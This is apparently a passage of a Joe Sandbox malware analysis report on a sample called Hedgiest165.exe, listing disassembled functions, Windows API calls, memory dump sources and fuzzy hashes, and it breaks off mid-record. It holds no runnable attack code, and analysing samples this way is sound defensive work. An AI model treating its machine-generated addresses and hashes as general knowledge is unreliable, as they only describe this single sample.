                                                                        • Instruction Fuzzy Hash: F4F0AF39A80208BFEB219F94C909F9EBFF9EF14765F000168F909A6144DB349A41CA93
                                                                        APIs
                                                                        • lstrcatW.KERNEL32(00000000,00000000,0040A5C8,00436000,?,?,00000031), ref: 004017B0
                                                                        • CompareFileTime.KERNEL32(-00000014,?,0040A5C8,0040A5C8,00000000,00000000,0040A5C8,00436000,?,?,00000031), ref: 004017D5
                                                                          • Part of subcall function 004063DB: lstrcpynW.KERNEL32(?,?,00000400,00403560,00429220,NSIS Error,?,00000007,00000009,0000000B), ref: 004063E8
                                                                          • Part of subcall function 00405443: lstrlenW.KERNEL32(004226E8,00000000,?,004031E6,?,?,?,?,?,?,?,?,?,00403385,00000000,?), ref: 0040547B
                                                                          • Part of subcall function 00405443: lstrlenW.KERNEL32(00403385,004226E8,00000000,?,004031E6,?,?,?,?,?,?,?,?,?,00403385,00000000), ref: 0040548B
                                                                          • Part of subcall function 00405443: lstrcatW.KERNEL32(004226E8,00403385,00403385,004226E8,00000000,?,004031E6), ref: 0040549E
                                                                          • Part of subcall function 00405443: SetWindowTextW.USER32(004226E8,004226E8), ref: 004054B0
                                                                          • Part of subcall function 00405443: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054D6
                                                                          • Part of subcall function 00405443: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054F0
                                                                          • Part of subcall function 00405443: SendMessageW.USER32(?,00001013,?,00000000), ref: 004054FE
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3284453807.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.3284432101.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284477212.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284502518.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284523897.000000000044A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                        • String ID:
                                                                        • API String ID: 1941528284-0
                                                                        • Opcode ID: 9c63aff5655d4e14ed2bbeeccd25930624a363ceffe893c688c7483ad26c4c8d
                                                                        • Instruction ID: 099db37703b38b7faa9c4b3761aa4ffcdc8a6de3d1088dc1ecc91c4b2867a8b7
                                                                        • Opcode Fuzzy Hash: 9c63aff5655d4e14ed2bbeeccd25930624a363ceffe893c688c7483ad26c4c8d
                                                                        • Instruction Fuzzy Hash: BB41C171500118BACB10BFA5DC85DAE7A79EF41328F20423FF822B10E1C77C8A519A6E
                                                                        APIs
                                                                        • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402E95
                                                                        • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402EE1
                                                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402EEA
                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F01
                                                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F0C
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3284453807.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.3284432101.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284477212.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284502518.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284523897.000000000044A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: CloseEnum$DeleteValue
                                                                        • String ID:
                                                                        • API String ID: 1354259210-0
                                                                        • Opcode ID: 0ef7066dde05a2ca5f9e50454b412eec226e379908bdbcc4328f96335d0522a1
                                                                        • Instruction ID: 0e68a9e52e1d6489b1d96d2929a27e43e5cdd4abb6d38d1bd7d6776dab24ddff
                                                                        • Opcode Fuzzy Hash: 0ef7066dde05a2ca5f9e50454b412eec226e379908bdbcc4328f96335d0522a1
                                                                        • Instruction Fuzzy Hash: 62215A71500109BBDF129F90CE89EEF7A7DEB54348F110076B905B11A0E7B48E54AAA8
                                                                        APIs
                                                                        • GetDlgItem.USER32(?,?), ref: 00401D9A
                                                                        • GetClientRect.USER32(?,?), ref: 00401DE5
                                                                        • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
                                                                        • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                                                                        • DeleteObject.GDI32(00000000), ref: 00401E39
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3284453807.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.3284432101.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284477212.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284502518.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284523897.000000000044A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                        • String ID:
                                                                        • API String ID: 1849352358-0
                                                                        • Opcode ID: 78de8004f446787f372156ede0f2d89c690e9876039cb0b07cc28f686e634743
                                                                        • Instruction ID: 4c6ae9b1abf83e60acb3738700a7a9d8e0f5f354904a09afb896d410ef8a521a
                                                                        • Opcode Fuzzy Hash: 78de8004f446787f372156ede0f2d89c690e9876039cb0b07cc28f686e634743
                                                                        • Instruction Fuzzy Hash: CE212672A00119AFCB05CFA4DE45AEEBBB5EF08304F14003AF945F62A0CB389D51DB98
                                                                        APIs
                                                                        • GetLastError.KERNEL32(00000000,?,00000000,221C636D,221C5713,00000000,?,221C2249,?,?,221C1D66,00000000,?,?,00000000), ref: 221C5B7F
                                                                        • _free.LIBCMT ref: 221C5BB4
                                                                        • _free.LIBCMT ref: 221C5BDB
                                                                        • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 221C5BE8
                                                                        • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 221C5BF1
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3298999836.00000000221C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 221C0000, based on PE: true
                                                                        • Associated: 00000006.00000002.3298980061.00000000221C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3298999836.00000000221D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_221c0000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast$_free
                                                                        • String ID:
                                                                        • API String ID: 3170660625-0
                                                                        • Opcode ID: 42a033f788043ba5602191ac0059f65384b07ee140def2cbc4e88a916616d568
                                                                        • Instruction ID: 4e86325cf58ba52b5dcd9a7cd15e55e75db843af6f87df0f0d99e28fcbb105b9
                                                                        • Opcode Fuzzy Hash: 42a033f788043ba5602191ac0059f65384b07ee140def2cbc4e88a916616d568
                                                                        • Instruction Fuzzy Hash: 9101F9BE2C5701BBD22216341D84F4F2FAB9BF16707630224FC15B6141EE698B014163
                                                                        APIs
                                                                        • GetDC.USER32(?), ref: 00401E51
                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                                        • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                                                        • ReleaseDC.USER32(?,00000000), ref: 00401E84
                                                                        • CreateFontIndirectW.GDI32(0040CDC8), ref: 00401ED3
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3284453807.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.3284432101.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284477212.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284502518.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284523897.000000000044A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: CapsCreateDeviceFontIndirectRelease
                                                                        • String ID:
                                                                        • API String ID: 3808545654-0
                                                                        • Opcode ID: 383e59609db2bd9392710b838b48bfda8626baac977e96e1bde4cf408244bbd6
                                                                        • Instruction ID: b60ccfaacb74251373a9760c042081773c0d6d705e51916df09e3ce9171beb14
                                                                        • Opcode Fuzzy Hash: 383e59609db2bd9392710b838b48bfda8626baac977e96e1bde4cf408244bbd6
                                                                        • Instruction Fuzzy Hash: 2701D871950650EFEB006BB4AE89BDA3FB0AF55301F10493AF141B71E2C6B90404DB3D
                                                                        APIs
                                                                        • lstrlenW.KERNEL32(?,?,?,?,?,221C10DF,?,?,?,00000000), ref: 221C1E9A
                                                                        • lstrcatW.KERNEL32(?,?,?,221C10DF,?,?,?,00000000), ref: 221C1EAC
                                                                        • lstrlenW.KERNEL32(?,?,221C10DF,?,?,?,00000000), ref: 221C1EB3
                                                                        • lstrlenW.KERNEL32(?,?,221C10DF,?,?,?,00000000), ref: 221C1EC8
                                                                        • lstrcatW.KERNEL32(?,221C10DF,?,221C10DF,?,?,?,00000000), ref: 221C1ED3
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3298999836.00000000221C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 221C0000, based on PE: true
                                                                        • Associated: 00000006.00000002.3298980061.00000000221C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3298999836.00000000221D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_221c0000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: lstrlen$lstrcat
                                                                        • String ID:
                                                                        • API String ID: 493641738-0
                                                                        • Opcode ID: 6d666786f8982ad074a72a2040455f45378498dfd36dd43833164a9f6ab184bc
                                                                        • Instruction ID: 1f97a66dcdd21d44594052c5afbcffcbb9b41f096197faf196e20652e2f92c5a
                                                                        • Opcode Fuzzy Hash: 6d666786f8982ad074a72a2040455f45378498dfd36dd43833164a9f6ab184bc
                                                                        • Instruction Fuzzy Hash: 7FF0892A1802147AD725371DAC85EBF7B7CEFD6B70B540419FA0883190DB94695292B7
                                                                        APIs
                                                                        • _free.LIBCMT ref: 221C536F
                                                                          • Part of subcall function 221C571E: HeapFree.KERNEL32(00000000,00000000,?,221C924F,?,00000000,?,00000000,?,221C9276,?,00000007,?,?,221C7E5A,?), ref: 221C5734
                                                                          • Part of subcall function 221C571E: GetLastError.KERNEL32(?,?,221C924F,?,00000000,?,00000000,?,221C9276,?,00000007,?,?,221C7E5A,?,?), ref: 221C5746
                                                                        • _free.LIBCMT ref: 221C5381
                                                                        • _free.LIBCMT ref: 221C5394
                                                                        • _free.LIBCMT ref: 221C53A5
                                                                        • _free.LIBCMT ref: 221C53B6
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3298999836.00000000221C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 221C0000, based on PE: true
                                                                        • Associated: 00000006.00000002.3298980061.00000000221C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3298999836.00000000221D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_221c0000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                        • String ID:
                                                                        • API String ID: 776569668-0
                                                                        • Opcode ID: 09c3d5f8b37cb388f212f101ce1c18ea22e62f59f8bcf4158ee04797df4d9178
                                                                        • Instruction ID: f9f8c8af2e9a2c4869494bed31d8b81c219fa4131ead0a7d460691c8614367c6
                                                                        • Opcode Fuzzy Hash: 09c3d5f8b37cb388f212f101ce1c18ea22e62f59f8bcf4158ee04797df4d9178
                                                                        • Instruction Fuzzy Hash: C1F01DB4AD6324FBCA565B649681C0B3BE2A7357503410A16EC14FB258D73916418F82
                                                                        APIs
                                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\Hedgiest165.exe,00000104), ref: 221C4C1D
                                                                        • _free.LIBCMT ref: 221C4CE8
                                                                        • _free.LIBCMT ref: 221C4CF2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3298999836.00000000221C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 221C0000, based on PE: true
                                                                        • Associated: 00000006.00000002.3298980061.00000000221C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3298999836.00000000221D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_221c0000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: _free$FileModuleName
                                                                        • String ID: C:\Users\user\AppData\Local\Temp\Hedgiest165.exe
                                                                        • API String ID: 2506810119-599107038
                                                                        • Opcode ID: edcf921df2322a9e9192aafb382acafbaec35138237eb02d0b94e020e5917d8a
                                                                        • Instruction ID: 8ab487dc9b4973bdd1606269eaa661f0ec938a9aaac1ca96879cd85beaccb225
                                                                        • Opcode Fuzzy Hash: edcf921df2322a9e9192aafb382acafbaec35138237eb02d0b94e020e5917d8a
                                                                        • Instruction Fuzzy Hash: C631AEB9A8931CEFDB11CF99C982D9FBBFCEBA5310B104066E904D7210D6758B41CB66
                                                                        APIs
                                                                        • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                                                                        • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3284453807.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.3284432101.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284477212.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284502518.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284523897.000000000044A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Timeout
                                                                        • String ID: !
                                                                        • API String ID: 1777923405-2657877971
                                                                        • Opcode ID: 85a27d883e9730f87e0fcbf2f18326d15f90d0f3bc73a62618d738046c98a18f
                                                                        • Instruction ID: dd4700ba4ce2c01fdcac70281bc34cd4026078c78447772ebe71ed50cab348e7
                                                                        • Opcode Fuzzy Hash: 85a27d883e9730f87e0fcbf2f18326d15f90d0f3bc73a62618d738046c98a18f
                                                                        • Instruction Fuzzy Hash: 3C21AD7195420AAEEF05AFB4D94AAAE7BB0EF44304F10453EF601B61D1D7B84941CBA8
                                                                        APIs
                                                                        • lstrlenW.KERNEL32(00423708,00423708,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,?,000000DF,00000000,00000400,?), ref: 00404C7F
                                                                        • wsprintfW.USER32 ref: 00404C88
                                                                        • SetDlgItemTextW.USER32(?,00423708), ref: 00404C9B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3284453807.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.3284432101.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284477212.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284502518.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284523897.000000000044A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: ItemTextlstrlenwsprintf
                                                                        • String ID: %u.%u%s%s
                                                                        • API String ID: 3540041739-3551169577
                                                                        • Opcode ID: d10727bfe45036c7ef4c0945d22c1597f07d9cc2f464814d913e74af0bd9f4be
                                                                        • Instruction ID: 7c0a82a5d8c5e130c70e624adf1be80dcdc0ad06cf4f4d66f209f919317c7709
                                                                        • Opcode Fuzzy Hash: d10727bfe45036c7ef4c0945d22c1597f07d9cc2f464814d913e74af0bd9f4be
                                                                        • Instruction Fuzzy Hash: 9B11D5736041283BEB00666D9C45EDE3298DBC5334F264237FA26F61D1E978CC2286E8
                                                                        APIs
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,221C6FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 221C8731
                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 221C87BA
                                                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 221C87CC
                                                                        • __freea.LIBCMT ref: 221C87D5
                                                                          • Part of subcall function 221C56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 221C5702
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3298999836.00000000221C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 221C0000, based on PE: true
                                                                        • Associated: 00000006.00000002.3298980061.00000000221C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3298999836.00000000221D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_221c0000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                        • String ID:
                                                                        • API String ID: 2652629310-0
                                                                        • Opcode ID: 457f9acb906ea55405a5c4d86938d0ae9658d4dd72ac9f6d93cc24c1398e9720
                                                                        • Instruction ID: 2736ad837de3b928771c7c8da24382308e6f7ff214dcfc5331ff81b434faebfc
                                                                        • Opcode Fuzzy Hash: 457f9acb906ea55405a5c4d86938d0ae9658d4dd72ac9f6d93cc24c1398e9720
                                                                        • Instruction Fuzzy Hash: AF31AE3AA4031AAFDF168F64CC80EEF7BA5EB64714F420179ED04D6190E735DA51CB92
                                                                        APIs
                                                                        • CreateDirectoryW.KERNEL32(?,?,00437800), ref: 00405955
                                                                        • GetLastError.KERNEL32 ref: 00405969
                                                                        • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040597E
                                                                        • GetLastError.KERNEL32 ref: 00405988
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3284453807.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.3284432101.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284477212.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284502518.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284523897.000000000044A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                        • String ID:
                                                                        • API String ID: 3449924974-0
                                                                        • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                        • Instruction ID: dda0a131242ff184f2ccb02743bd446f17612fd9a9d8f3d2581d745ec2ea809b
                                                                        • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                        • Instruction Fuzzy Hash: 010108B1C00219EADF009BA0C944BEFBBB4EB04364F00803AD945B6180D77996488FA9
                                                                        APIs
                                                                        • DestroyWindow.USER32(?,00000000,0040318F,00000001,?,00000007,00000009,0000000B), ref: 00402FC4
                                                                        • GetTickCount.KERNEL32 ref: 00402FE2
                                                                        • CreateDialogParamW.USER32(0000006F,00000000,00402F2B,00000000), ref: 00402FFF
                                                                        • ShowWindow.USER32(00000000,00000005,?,00000007,00000009,0000000B), ref: 0040300D
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3284453807.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.3284432101.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284477212.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284502518.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284523897.000000000044A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                        • String ID:
                                                                        • API String ID: 2102729457-0
                                                                        • Opcode ID: eb8a77809652c3cac4ec89cd0a4f321326171d75a79424ed64d57ab8b532068a
                                                                        • Instruction ID: cb146776896af08e1a0fdef995d2a06b2a54ad4518ff1494983f568d8b9f1051
                                                                        • Opcode Fuzzy Hash: eb8a77809652c3cac4ec89cd0a4f321326171d75a79424ed64d57ab8b532068a
                                                                        • Instruction Fuzzy Hash: 52F05E31606621EBC6716F10FE0CA8B7BA5FB44B42B52487AF441B11E5D7B608829BAD
                                                                        APIs
                                                                        • _free.LIBCMT ref: 221C655C
                                                                          • Part of subcall function 221C62BC: IsProcessorFeaturePresent.KERNEL32(00000017,221C62AB,00000000,?,?,?,?,00000016,?,?,221C62B8,00000000,00000000,00000000,00000000,00000000), ref: 221C62BE
                                                                          • Part of subcall function 221C62BC: GetCurrentProcess.KERNEL32(C0000417), ref: 221C62E0
                                                                          • Part of subcall function 221C62BC: TerminateProcess.KERNEL32(00000000), ref: 221C62E7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3298999836.00000000221C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 221C0000, based on PE: true
                                                                        • Associated: 00000006.00000002.3298980061.00000000221C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3298999836.00000000221D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_221c0000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                        • String ID: *?$.
                                                                        • API String ID: 2667617558-3972193922
                                                                        • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                        • Instruction ID: 210f4a18d783d2f04aa3054ef511154ca7f99cc937ab12fbf7d1d5ca3d281737
                                                                        • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                        • Instruction Fuzzy Hash: 8A519C79E4030AAFDB04CFA8C980EEDBBB5EFA8314F248169D954E7345E6359B018B51
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3298999836.00000000221C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 221C0000, based on PE: true
                                                                        • Associated: 00000006.00000002.3298980061.00000000221C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3298999836.00000000221D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_221c0000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: _strlen
                                                                        • String ID: : $Se.
                                                                        • API String ID: 4218353326-4089948878
                                                                        • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                        • Instruction ID: d6d70ed4ae44d4deb77d12ab65ab8b63c3dc4a385ec1c381d28b0c665e33066f
                                                                        • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                        • Instruction Fuzzy Hash: A611E7B5944348AECB10CFA8D841FDEFBFCAF29704F504056E545E7212E6705B02C7A6
                                                                        APIs
                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 221C2903
                                                                          • Part of subcall function 221C35D2: RaiseException.KERNEL32(?,?,?,221C2925,00000000,00000000,00000000,?,?,?,?,?,221C2925,?,221D21B8), ref: 221C3632
                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 221C2920
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3298999836.00000000221C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 221C0000, based on PE: true
                                                                        • Associated: 00000006.00000002.3298980061.00000000221C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3298999836.00000000221D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_221c0000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: Exception@8Throw$ExceptionRaise
                                                                        • String ID: Unknown exception
                                                                        • API String ID: 3476068407-410509341
                                                                        • Opcode ID: bf8aeee70949c39c3d74f45866af0ab1c75e3f8ba972bd4c16a3873e954b1723
                                                                        • Instruction ID: 4a742a2ac25d1ec9f1b7ea18f12e4dfad23481f90f68724a45c1166eb1f7413c
                                                                        • Opcode Fuzzy Hash: bf8aeee70949c39c3d74f45866af0ab1c75e3f8ba972bd4c16a3873e954b1723
                                                                        • Instruction Fuzzy Hash: C3F0A43C9C430CBB8B0CAAA4ED45D9977AC5B31F50B504270AA2496095EBB1EB16C583
                                                                        APIs
                                                                        • IsWindowVisible.USER32(?), ref: 004053E6
                                                                        • CallWindowProcW.USER32(?,?,?,?), ref: 00405437
                                                                          • Part of subcall function 0040437D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040438F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3284453807.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.3284432101.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284477212.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284502518.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284523897.000000000044A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: Window$CallMessageProcSendVisible
                                                                        • String ID:
                                                                        • API String ID: 3748168415-3916222277
                                                                        • Opcode ID: c5cb8f23af6b896a3e8b7c90a0bf6a7c51e0247c130c34a679b5b1bbff870e58
                                                                        • Instruction ID: da482bbf0ee2bc432bcdf1377e528ba943c285c76ef4d04d2afca056141c401e
                                                                        • Opcode Fuzzy Hash: c5cb8f23af6b896a3e8b7c90a0bf6a7c51e0247c130c34a679b5b1bbff870e58
                                                                        • Instruction Fuzzy Hash: 4E01B131200608ABDF314F11ED81B9B3629EB84752F608037FA01752D1C7798DD29E69
                                                                        APIs
                                                                        • GetTickCount.KERNEL32 ref: 00405F1E
                                                                        • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00435000,0040348D,00437000,00437800,00437800,00437800,00437800,00437800,00437800,004036D9), ref: 00405F39
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3284453807.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.3284432101.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284477212.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284502518.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
